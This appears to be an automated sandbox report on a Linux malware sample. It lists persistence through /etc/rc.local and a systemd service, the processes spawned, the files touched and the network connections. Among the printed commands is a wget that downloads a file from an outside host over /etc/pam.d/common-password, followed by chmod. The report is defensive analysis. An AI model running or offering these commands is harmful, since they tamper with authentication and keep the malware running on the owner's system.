Technical Information
To ensure autorun and distribution:
Creates or modifies the following files:
- /etc/rc.local
Malicious functions:
Manages services:
- systemctl enable rc-local
- systemctl start rc-local.service
Launches processes:
- /bin/bash <SAMPLE_FULL_PATH> -c exec '<SAMPLE_FULL_PATH>' \"$@\" <SAMPLE_FULL_PATH>
- <SAMPLE_FULL_PATH>
- /bin/bash <SAMPLE_FULL_PATH> -c
- wget -qO- https://icanhazip.com
- ip -o -4 route show to default
- awk {print $5}
- wget -O /etc/pam.d/common-password https://zikristore.my.id/ws/password
- chmod +x /etc/pam.d/common-password
- cat
- chmod +x /etc/rc.local
- sed -i $ i\echo 1 > /proc/sys/net/ipv6/conf/all/disable_ipv6 /etc/rc.local
- apt update -y
- /usr/bin/dpkg --print-foreign-architectures
- /usr/lib/apt/methods/http
- /usr/lib/apt/methods/gpgv
- /usr/bin/gpgv #3 ##/etc/apt/trusted.gpg.d/debian-archive-jessie-security-automatic.gpg ##/etc/apt/trusted.gpg.d/debian-archive-squeeze-automatic.gpg ##/etc/apt/trusted.gpg.d/debian-archive-jessie-automatic.gpg ##/etc/apt/trusted.gpg.d/debian-archive-squeeze-stable.gpg ##/etc/apt/trusted.gpg.d/debian-archive-wheezy-stable.gpg ##/etc/apt/trusted.gpg.d/debian-archive-jessie-stable.gpg ##/etc/apt/trusted.gpg.d/debian-archive-wheezy-automatic.gpg /tmp/apt.sig.EsEW05 /tmp/apt.data.Fmns0f
- /usr/lib/apt/methods/bzip2
- /usr/bin/gpgv #3 ##/etc/apt/trusted.gpg.d/debian-archive-jessie-security-automatic.gpg ##/etc/apt/trusted.gpg.d/debian-archive-squeeze-automatic.gpg ##/etc/apt/trusted.gpg.d/debian-archive-jessie-automatic.gpg ##/etc/apt/trusted.gpg.d/debian-archive-squeeze-stable.gpg ##/etc/apt/trusted.gpg.d/debian-archive-wheezy-stable.gpg ##/etc/apt/trusted.gpg.d/debian-archive-jessie-stable.gpg ##/etc/apt/trusted.gpg.d/debian-archive-wheezy-automatic.gpg /tmp/apt.sig.SgM2DB /tmp/apt.data.7cT1nR
- /usr/bin/gpgv --ignore-time-conflict --status-fd 3 --keyring /etc/apt/trusted.gpg.d/debian-archive-jessie-security-automatic.gpg --keyring /etc/apt/trusted.gpg.d/debian-archive-squeeze-automatic.gpg --keyring /etc/apt/trusted.gpg.d/debian-archive-jessie-automatic.gpg --keyring /etc/apt/trusted.gpg.d/debian-archive-squeeze-stable.gpg --keyring /etc/apt/trusted.gpg.d/debian-archive-wheezy-stable.gpg --keyring /etc/apt/trusted.gpg.d/debian-archive-jessie-stable.gpg --keyring /etc/apt/trusted.gpg.d/debian-archive-wheezy-automatic.gpg /var/lib/apt/lists/partial/ftp.ru.debian.org_debian_dists_jessie_Release.gpg /var/lib/apt/lists/partial/ftp.ru.debian.org_debian_dists_jessie_Release
- /usr/lib/apt/methods/gzip
Kills the following processes:
- /usr/lib/apt/methods/http
- /usr/lib/apt/methods/gpgv
- /usr/lib/apt/methods/bzip2
Performs operations with the file system:
Modifies file access rights:
- /etc/pam.d/common-password
- /etc/rc.local
- /etc/sedDhT18e
- /var/lib/apt/lists/security.debian.org_dists_jessie_updates_InRelease
- /var/lib/apt/lists/partial/security.debian.org_dists_jessie_updates_main_source_Sources.bz2.decomp.doZzvm
- /var/lib/apt/lists/ftp.ru.debian.org_debian_dists_jessie-updates_InRelease
Creates or modifies files:
- /etc/pam.d/common-password
- /etc/systemd/system/rc-local.service
- /tmp/sh-thd-190117101
- /proc/sys/net/ipv6/conf/all/disable_ipv6
- /etc/sedDhT18e
- /var/lib/apt/lists/lock
- /var/lib/apt/lists/security.debian.org_dists_jessie_updates_InRelease
- /var/lib/apt/lists/ftp.ru.debian.org_debian_dists_jessie-updates_InRelease
- /var/lib/apt/lists/partial/security.debian.org_dists_jessie_updates_InRelease
- /var/lib/apt/lists/ftp.ru.debian.org_debian_dists_jessie_Release.gpg
- /var/lib/apt/lists/partial/ftp.ru.debian.org_debian_dists_jessie-updates_InRelease
- /var/lib/apt/lists/partial/ftp.ru.debian.org_debian_dists_jessie_Release.gpg
- /tmp/apt.sig.EsEW05
- /tmp/apt.data.Fmns0f
- /var/lib/apt/lists/partial/ftp.ru.debian.org_debian_dists_jessie_Release
- /tmp/fileutl.message.NtN8OI
- /tmp/fileutl.message.NtN8OI (deleted)
- /tmp/apt.sig.SgM2DB
- /tmp/apt.data.7cT1nR
- /var/lib/apt/lists/partial/security.debian.org_dists_jessie_updates_main_source_Sources.bz2
- /tmp/fileutl.message.Ww5iX1
- /tmp/fileutl.message.Ww5iX1 (deleted)
- /var/lib/apt/lists/partial/security.debian.org_dists_jessie_updates_main_source_Sources.bz2.decomp.doZzvm
- /var/lib/apt/lists/partial/ftp.ru.debian.org_debian_dists_jessie-updates_main_source_Sources.gz
- /var/lib/apt/lists/partial/security.debian.org_dists_jessie_updates_main_binary-amd64_Packages.bz2
Deletes files:
- /tmp/sh-thd-190117101
- /var/lib/apt/lists/partial/ftp.ru.debian.org_debian_dists_jessie_Release.gpg
- /tmp/apt.sig.EsEW05
- /tmp/apt.data.Fmns0f
- /tmp/fileutl.message.NtN8OI
- /tmp/apt.sig.SgM2DB
- /tmp/apt.data.7cT1nR
- /tmp/fileutl.message.Ww5iX1
Network activity:
Establishes connection:
- <LOCAL_DNS_SERVER>
- [2#####700::6812:69c]:0
- [2#####700::6812:79c]:0
- 10#.#8.7.156:0
- 10#.#8.6.156:0
- 10#.##.7.156:443
- 10#.##7.9.207:443
- 15#.##1.130.132:80
- 15#.##1.194.132:80
- 15#.##1.2.132:80
HTTP GET requests:
- se######.#####n.org/dists/jessie/updates/InRelease
- ft#.##.######.org/debian/dists/jessie/InRelease
- ft#.##.######.#rg/debian/dists/jessie-updates/InRelease
- ft#.##.######.org/debian/dists/jessie/Release.gpg
- ft#.##.######.org/debian/dists/jessie/Release
- se######.######.##g/dists/jessie/updates/main/source/Sources.bz2
- se######.######.###/dists/jessie/updates/main/binary-amd64/Packages.bz2
- ft#.##.######.#####ebian/dists/jessie-updates/main/source/Sources.gz
DNS ASK:
- ic###azip.com
- zi####tore.my.id
- se####ty.debian.org
- ft#.##.debian.org
Sends data to the following servers:
- 10#.##.7.156:443
- 10#.##7.9.207:443
Receives data from the following servers:
- 10#.##.7.156:443
- 10#.##7.9.207:443
Other:
Collects RAM information
